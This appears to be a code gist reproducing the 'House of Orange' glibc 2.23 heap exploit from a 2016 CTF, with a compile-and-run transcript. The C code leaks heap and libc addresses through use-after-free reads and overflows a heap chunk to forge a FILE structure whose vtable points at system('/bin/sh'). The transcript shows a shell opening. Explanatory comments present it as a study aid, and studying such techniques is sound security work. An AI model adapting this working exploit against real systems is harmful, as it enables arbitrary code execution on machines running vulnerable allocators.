House of Orange attack / http://4ngelboy.blogspot.jp/2016/10/hitcon-ctf-qual-2016-house-of-orange.html
$ gcc house_of_orange.c -o house_of_orange | |
house_of_orange.c: In function ‘main’: | |
house_of_orange.c:39:29: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
*(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */ | |
^ | |
house_of_orange.c:42:30: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
*(void **)(p1+0x80+0x30) = -1; | |
^ | |
$ ./house_of_orange | |
[+] allocate p1, p2, p3, p4, p5 | |
[+] free p4 and p2 | |
[+] leak heap addresses | |
addr_heap = 0x19895f0 | |
addr_p2 = 0x19894b0 | |
[+] free p5 | |
[+] leak libc addresses | |
arena_top = 0x7ff6c6db0b78 | |
libc_base = 0x7ff6c69ed000 | |
libc_system = 0x7ff6c6a32380 | |
libc_IO_list_all = 0x7ff6c6db1520 | |
[+] abuse p1 overflow | |
[+] allocate p6 | |
*** Error in `./house_of_orange': malloc(): memory corruption: 0x00007ff6c6db1520 *** | |
======= Backtrace: ========= | |
/lib/x86_64-linux-gnu/libc.so.6(+0x77725)[0x7ff6c6a64725] | |
/lib/x86_64-linux-gnu/libc.so.6(+0x819be)[0x7ff6c6a6e9be] | |
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7ff6c6a705a4] | |
./house_of_orange[0x400881] | |
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ff6c6a0d830] | |
./house_of_orange[0x400599] | |
======= Memory map: ======== | |
00400000-00401000 r-xp 00000000 fc:00 1722079 /tmp/b1f6f599456259bd1804b6c4c1449428/house_of_orange | |
00600000-00601000 r--p 00000000 fc:00 1722079 /tmp/b1f6f599456259bd1804b6c4c1449428/house_of_orange | |
00601000-00602000 rw-p 00001000 fc:00 1722079 /tmp/b1f6f599456259bd1804b6c4c1449428/house_of_orange | |
01989000-019aa000 rw-p 00000000 00:00 0 [heap] | |
7ff6c0000000-7ff6c0021000 rw-p 00000000 00:00 0 | |
7ff6c0021000-7ff6c4000000 ---p 00000000 00:00 0 | |
7ff6c67d7000-7ff6c67ed000 r-xp 00000000 fc:00 262679 /lib/x86_64-linux-gnu/libgcc_s.so.1 | |
7ff6c67ed000-7ff6c69ec000 ---p 00016000 fc:00 262679 /lib/x86_64-linux-gnu/libgcc_s.so.1 | |
7ff6c69ec000-7ff6c69ed000 rw-p 00015000 fc:00 262679 /lib/x86_64-linux-gnu/libgcc_s.so.1 | |
7ff6c69ed000-7ff6c6bad000 r-xp 00000000 fc:00 262653 /lib/x86_64-linux-gnu/libc-2.23.so | |
7ff6c6bad000-7ff6c6dac000 ---p 001c0000 fc:00 262653 /lib/x86_64-linux-gnu/libc-2.23.so | |
7ff6c6dac000-7ff6c6db0000 r--p 001bf000 fc:00 262653 /lib/x86_64-linux-gnu/libc-2.23.so | |
7ff6c6db0000-7ff6c6db2000 rw-p 001c3000 fc:00 262653 /lib/x86_64-linux-gnu/libc-2.23.so | |
7ff6c6db2000-7ff6c6db6000 rw-p 00000000 00:00 0 | |
7ff6c6db6000-7ff6c6ddc000 r-xp 00000000 fc:00 262629 /lib/x86_64-linux-gnu/ld-2.23.so | |
7ff6c6fcc000-7ff6c6fcf000 rw-p 00000000 00:00 0 | |
7ff6c6fd8000-7ff6c6fdb000 rw-p 00000000 00:00 0 | |
7ff6c6fdb000-7ff6c6fdc000 r--p 00025000 fc:00 262629 /lib/x86_64-linux-gnu/ld-2.23.so | |
7ff6c6fdc000-7ff6c6fdd000 rw-p 00026000 fc:00 262629 /lib/x86_64-linux-gnu/ld-2.23.so | |
7ff6c6fdd000-7ff6c6fde000 rw-p 00000000 00:00 0 | |
7ffd8137a000-7ffd8139b000 rw-p 00000000 00:00 0 [stack] | |
7ffd813e3000-7ffd813e5000 r--p 00000000 00:00 0 [vvar] | |
7ffd813e5000-7ffd813e7000 r-xp 00000000 00:00 0 [vdso] | |
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] | |
$ id | |
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker) | |
$ | |
Aborted (core dumped) | |
$ /lib/x86_64-linux-gnu/libc.so.6 | |
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al. | |
Copyright (C) 2016 Free Software Foundation, Inc. | |
This is free software; see the source for copying conditions. | |
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A | |
PARTICULAR PURPOSE. | |
Compiled by GNU CC version 5.3.1 20160413. | |
Available extensions: | |
crypt add-on version 2.1 by Michael Glad and others | |
GNU Libidn by Simon Josefsson | |
Native POSIX Threads Library by Ulrich Drepper et al | |
BIND-8.2.3-T5B | |
libc ABIs: UNIQUE IFUNC | |
For bug reporting instructions, please see: | |
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>. |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
/*
 * Proof-of-concept reproduction of the "House of Orange" glibc heap
 * technique (write-up linked in the gist description above).
 *
 * Everything in main() depends on undefined behavior -- stores past the
 * end of p1's 0x80-byte allocation and reads through freed pointers --
 * and on hard-coded offsets for one specific libc build (the transcript
 * on this page names Ubuntu GLIBC 2.23-0ubuntu3).  It is a study aid for
 * understanding what allocator integrity checks have to defend against,
 * not reusable code: on any other libc build the constants below do not
 * match.  Returns 0 if execution gets that far; the transcript shows
 * glibc's own check aborting inside the final malloc() with
 * "malloc(): memory corruption".
 *
 * Style note: `int main(void)` is the idiomatic prototype; `int main()`
 * declares a function without a prototype.
 */
int main() | |
{ | |
puts("[+] allocate p1, p2, p3, p4, p5"); | |
/* Five live chunks of increasing size.  p3 is never referenced again
 * (presumably it only keeps p2 and p4 from being adjacent -- TODO confirm
 * against the linked write-up). */
char *p1 = malloc(0x80); | |
char *p2 = malloc(0x90); | |
char *p3 = malloc(0xa0); | |
char *p4 = malloc(0xb0); | |
char *p5 = malloc(0xc0); | |
puts("\n[+] free p4 and p2"); | |
free(p4); | |
free(p2); | |
puts("\n[+] leak heap addresses"); | |
/* Use-after-free read: p2 was freed two lines above and its first word is
 * read back here.  Whatever the allocator left there (presumably a
 * free-list link -- not visible from this file) is treated as a heap
 * address. */
char *addr_heap = *(void **)p2; | |
/* 0x140 is a layout-specific constant tied to the exact allocation
 * sequence above; changing any size or the order invalidates it. */
char *addr_p2 = addr_heap - 0x140; | |
printf("addr_heap = %p\n", addr_heap); | |
printf("addr_p2 = %p\n", addr_p2); | |
puts("\n[+] free p5"); | |
free(p5); | |
puts("\n[+] leak libc addresses"); | |
/* Second use-after-free read of the same freed chunk, after free(p5) has
 * changed what the allocator stores in it. */
char *arena_top = *(void **)p2; | |
/* The three offsets below are what ties this PoC to one libc binary
 * (Ubuntu GLIBC 2.23-0ubuntu3 per the transcript); they are not derived
 * at run time. */
char *libc_base = arena_top - 0x3c3b78; | |
char *libc_system = libc_base + 0x45380; | |
char *libc_IO_list_all = libc_base + 0x3c4520; | |
printf("arena_top = %p\n", arena_top); | |
printf("libc_base = %p\n", libc_base); | |
printf("libc_system = %p\n", libc_system); | |
printf("libc_IO_list_all = %p\n", libc_IO_list_all); | |
puts("\n[+] abuse p1 overflow"); | |
/* Every store from here to the "allocate p6" line lands at p1+0x80 or
 * beyond, i.e. past the end of p1's malloc(0x80) allocation: an
 * out-of-bounds heap write (undefined behavior).  The last store, at
 * p1+0x80+0xd8, reaches 0x160 bytes past p1, so the writes presumably
 * cover the neighbouring chunk's header and contents -- exactly the
 * corruption that allocator integrity checks exist to catch. */
memcpy(p1+0x80, "/bin/sh\x00", 8); /* first arg of __overflow() */ | |
/* Storing the integers 0x61 and -1 through a `void **` converts int to
 * pointer without a cast; gcc reports -Wint-conversion for this line and
 * for the `-1` store below, as the compile output in the transcript shows. */
*(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */ | |
*(void **)(p1+0x80+0x18) = libc_IO_list_all-0x10; /* unsorted bin attack */ | |
*(void **)(p1+0x80+0x28) = libc_system; /* vtable->__overflow */ | |
*(void **)(p1+0x80+0x30) = -1; | |
*(void **)(p1+0x80+0xa0) = addr_p2; /* _chain->vtable */ | |
*(void **)(p1+0x80+0xd8) = addr_p2; /* _IO_list_all->file->_chain */ | |
puts("\n[+] allocate p6"); | |
/* p6 is never read: this malloc() is what makes the allocator walk the
 * metadata corrupted above.  In the transcript glibc's integrity check
 * reports "malloc(): memory corruption" at this point.
 * NOTE(review): later glibc releases add further checks on this path
 * (stdio vtable validation), so the PoC is tied to the 2.23-era
 * allocator shown in the transcript -- confirm before citing it as
 * current behavior. */
char *p6 = malloc(0xd0); | |
/* p1, p3 and p6 are never freed; the process exits straight away. */
return 0; | |
} |